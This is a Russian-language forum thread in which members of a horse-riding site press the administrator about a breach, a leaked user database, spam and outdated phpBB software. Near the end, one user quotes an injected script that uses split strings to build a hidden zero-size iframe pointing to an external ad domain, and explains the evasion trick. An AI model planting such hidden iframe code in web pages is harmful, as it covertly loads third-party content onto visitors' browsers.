Сайт взломан, пароли в опасности!

Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Мда. А красивая картинка выходит. :)


Товарищ nevi, с форумом то.. чтобы не ломали, не пробовали движок обновлять не раз в жизни, а хотя бы раз в 2 месяца. Ведь phpBB латают и дорабатывают, как и воблу. Не говоря уж о всевозможных ресурсах, на которых обсуждаются уязвимости.

Про пользовательский функционал и про ссылки из тем, которые открываются _в текущем_ окне, а не в новом, я вообще промолчу.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Chernous M. D. написал(а):
Мда. А красивая картинка выходит. :)
Забейте, всех все устраивает.
Этот форум - всего лишь довесок к прокони-shop, а то, что тут по сотне пользователей в день и по тыщще сообщений и тем - так, приятное дополнение. Тут хоть движок по-приличнее, чем на хорсах, и на том спасибо. А что часть функционала не пашет, да периодически адрес попадает в черные списки гугла и прочих - мелочи. Главное - атмосфера :D
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Rovena написал(а):
Chernous M. D. написал(а):
Мда. А красивая картинка выходит. :)
Забейте, всех все устраивает.
Этот форум - всего лишь довесок к прокони-shop, а то, что тут по сотне пользователей в день и по тыщще сообщений и тем - так, приятное дополнение. Тут хоть движок по-приличнее, чем на хорсах, и на том спасибо. А что часть функционала не пашет, да периодически адрес попадает в черные списки гугла и прочих - мелочи. Главное - атмосфера :D

Не-не, в чем-то люди правы. Прокони.ру - не довесок к прокони-шоп..
Ведь именно все с прокони.ру и началось аж в 2001г! Переделаем. Просто за это время все столько раз поменялось. Ведь первую версию я делал совершенно сам на энузиазме (название, дизайн и кодинг в части, не касающейся форума).
Потом были редизайны и добаки функционала. И вот последняя в 2009г была сделана полными халтурщиками, результаты чего я и расхлебываю тут. А времени все заново делать все меньше :(
Но придется.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Chernous M. D. написал(а):
Мда. А красивая картинка выходит. :)


Товарищ nevi, с форумом то.. чтобы не ломали, не пробовали движок обновлять не раз в жизни, а хотя бы раз в 2 месяца. Ведь phpBB латают и дорабатывают, как и воблу. Не говоря уж о всевозможных ресурсах, на которых обсуждаются уязвимости.

Про пользовательский функционал и про ссылки из тем, которые открываются _в текущем_ окне, а не в новом, я вообще промолчу.

О, да я смотрю у нас еще специалисты! :) Отрадно!
"Раз в два месяца"? А вы знаете сколько апдейтов выходит к phpBB в настоящее время или так - для красного словца? В 2012 вышло 2 обновления. 3.0.10 в январе и 3.0.11 в августе и сразу были установлены.

Дело, вообще, не в форуме. Ну, да, это уже детали :)
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

nevi написал(а):
Chernous M. D. написал(а):
Мда. А красивая картинка выходит. :)


Товарищ nevi, с форумом то.. чтобы не ломали, не пробовали движок обновлять не раз в жизни, а хотя бы раз в 2 месяца. Ведь phpBB латают и дорабатывают, как и воблу. Не говоря уж о всевозможных ресурсах, на которых обсуждаются уязвимости.

Про пользовательский функционал и про ссылки из тем, которые открываются _в текущем_ окне, а не в новом, я вообще промолчу.

О, да я смотрю у нас еще специалисты! :) Отрадно!
"Раз в два месяца"? А вы знаете сколько апдейтов выходит к phpBB в настоящее время или так - для красного словца? В 2012 вышло 2 обновления. 3.0.10 в январе и 3.0.11 в августе и сразу были установлены.

Дело, вообще, не в форуме. Ну, да, это уже детали :)
Вы не ерничайте, со мной бесполезно. Не ведусь.
Я, честно говоря, вообще не понимаю, почему с 2001 года Вы не удосужились движок поменять? На ту же воблу, к примеру. Функционала больше, жрет ресурсов столько же сейчас. А про апдейты движка форума - вы уж меня извините, но не верю. На них скин надо перетягивать, что муторно, а если бы он перетягивался, то косяки был исправлялись. Этого тоже никто не делает. Или может быть у вас есть тестовая машина, куда Вы регулярно бекапы переливаете и на которой все обнволяете, а потом под шумок очередного бекапа хостинга переливаете? Сомнительно тоже.

Так что не надо в штыки. Не можете сами - хотя бы помощь примите, а не огрызайтесь. Плохого ресурсу никто не желает, а до магазина большинству дела нет. Что тоже, детали.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Я лично что-то вообще не оценила ТОН, с которым Вы тут пытаетесь общаться.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Trof написал(а):
Я лично что-то вообще не оценила ТОН, с которым Вы тут пытаетесь общаться.
Все нормально. На хамство хамством. Или админам огрызаться можно, а юзерам надо молчать в тряпочку? Админам можно сливать в руки хз кому базу, а потом опять молчать пользователям в тряпочку про тонны спама на ящик? Или молчать про то, что регистрация на форуме не возможна на нормальные почтовые сервисы, а вот mail.ru пожалуйста? Или постоянные баны поисковиками или же постоянные сообщения бразуера о том, что сайт заражен троянской программой? Это все нормально, Вас ЭТО устраивает? Я про откровенное хамство в ответ на предложение помочь уже промолчу. Вас ЭТО тоже устраивает?

В прочем, для рунета это нормально. Адекватный и хороший ресурс, который гробится из-за недостаточной квалификации тех. администрации. Или нежелания что-то делать большее, чем есть. Мол и так сойдет. И за то спасибо скажут.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

nevi написал(а):
Rovena написал(а):
Chernous M. D. написал(а):
Мда. А красивая картинка выходит. :)
Забейте, всех все устраивает.
Этот форум - всего лишь довесок к прокони-shop, а то, что тут по сотне пользователей в день и по тыщще сообщений и тем - так, приятное дополнение. Тут хоть движок по-приличнее, чем на хорсах, и на том спасибо. А что часть функционала не пашет, да периодически адрес попадает в черные списки гугла и прочих - мелочи. Главное - атмосфера :D

Не-не, в чем-то люди правы. Прокони.ру - не довесок к прокони-шоп..
Ведь именно все с прокони.ру и началось аж в 2001г! Переделаем. Просто за это время все столько раз поменялось. Ведь первую версию я делал совершенно сам на энузиазме (название, дизайн и кодинг в части, не касающейся форума).
Потом были редизайны и добаки функционала. И вот последняя в 2009г была сделана полными халтурщиками, результаты чего я и расхлебываю тут. А времени все заново делать все меньше :(
Но придется.
А на буллетин перейти не получится? На форуме реклама висит, её только на хостинг хватает, на движок не хватит?
Если денег нет, вариант - php-bb - он, как я понимаю, бесплатный, и регулярно обновляется. Там и админка интуитивно понятная :) Просто реально же толпа народу на форуме, такой посещаемый ресурс всегда будет привлекать недоброе внимание :( .
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Rovena написал(а):
А на буллетин перейти не получится? На форуме реклама висит, её только на хостинг хватает, на движок не хватит?
Если денег нет, вариант - php-bb - он, как я понимаю, бесплатный, и регулярно обновляется. Там и админка интуитивно понятная :) Просто реально же толпа народу на форуме, такой посещаемый ресурс всегда будет привлекать недоброе внимание :( .
Чтобы перейти на vbulletin он же вобла (если бы кто-то был в этом заинтересован, я бы отдала даром свою лицензию вторую, она мне на халяву досталась, но...) c phpBB (тут он и стоит, кстати), надо достаточно разбираться в MySQL. Судя по тому, что нашел случайный человек, который пришел случайно поискать, где бы покататься верхом, тех. админ с базами не дружен.
Перейти проблематично хотя бы уже потому, что таблицы данных разные. Есть скрипты-конвекторы, но их тоже надо настраивать. Я в свое время, когда phpBB был еще маленький совсем, а вобла только развивалась, на это угробила сутки... и форум мой тогда был в пару десятков мегабайт. Кроме всего прочего, происходить это все должно на машине с достаточной оперативной памятью или грамотно настроенным web-сервером.

И сильно я сомневаюсь, что у магазина нет 100 баксов на лицензию, и что у магазина нет денег на нормальную техническую поддержку ресурса, за счет которого магазин получил и получает клиентуру (до регистрации на этом форуме о существовании магазина и не знала вообще, думаю, таких тут большинство).

И дальше. Картина маслом. Тот, кто слил базу, может спокойно отдать ее ресурсу-конкуренту или создавать свой ресурс-конкурет. При этом спокойно перенеся туда все отсюда. А если при этом еще и как следует задосить этот форум, то такой ресурс очень быстро заменит этот форум. Обычная схема вредительства. Правда, в нашем случае, сомнительная, скорее действительно продадут базу спамерам.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Chernous M. D. написал(а):
И сильно я сомневаюсь, что у магазина нет 100 баксов на лицензию, и что у магазина нет денег на нормальную техническую поддержку ресурса, за счет которого магазин получил и получает клиентуру (до регистрации на этом форуме о существовании магазина и не знала вообще, думаю, таких тут большинство).
Ну, считать деньги магазина в любом случае не нам :)
Но факт остается фактом - движок надо улучшать, чтобы в один день оно все не рухнуло.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Если есть бекапы, то не рухнет. А бекапы точно есть у хостера. :)
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Тань, вот ничего не хочу сказать, но вчера мне первый раз за все время существования почтового ящика на Рамблере (а это несколько лет), указанного здесь для связи, пришел спам. Может и совпадение, конечно.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

Жаль, раньше не увидел.
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

А что делать кошда пароль забыла совсем?я попросила на почту восстановление пародля а письма все нет и нет..
 
Re: САЙТ ВЗЛОМАН, ПАРОЛИ В ОПАСНОСТИ!

А сейчас Вы как заходите? без пароля?
Пароль могу поменять принудительно. Получить ваш пароль вы можете только по мейлу.
 
Последнее время форум при открытии и переходе в любую тему периодически прокручивает страницу вниз. Вероятно, это происходит из-за следующего куска кода генерируемой страницы форума:

Код:
<script type="text/javascript">
var el = document.createElement("ifra"+"me");
document.body.appendChild(el);
el.src = 'ht'+'tp://pa'+'gel.adv'+'tab.ru/?s'+'how&key'+'word=ko';
el.width = '0';el.height = '0';el.frameBorder = '0';
_uacct = "UA-1256381-1";
urchinTracker();
</script>

Там "секретно" создается фрэйм внизу страницы, на него переходит фокус. А, чтобы браузеры фрейм в коде страницы не отловили - он создается вот так вот забавно - "ifra"+"me"

Со стороны пользователей проблема достаточно легко решается с помощью установки дополнения к браузеру - AdBlock (есть для Мозиллы и Хрома, про другие браузеры я не в курсе), и занесением адреса источника этого скрытного фрэйма в список фильтров, но администратор должен понимать, что в таком случае пользователи не будут видеть рекламные банеры форума и, соответственно, администрация форума будет получать значительно меньше денег за размещение этих банеров. Так что в интересах администрации этот мусорный кусок кода со страницы убрать.

Заранее благодарю.
 
Здравствуйте!
Подскажите, пожалуйста, можно ли отключить рекламу в дневниках? На сайте её и без того хватает. Очень на нервы действует, честно говоря.
Спасибо за внимание.
 
Вы про какую рекламу говорите?
Про ту, что между первым и вторым сообщением висит?
 
Сверху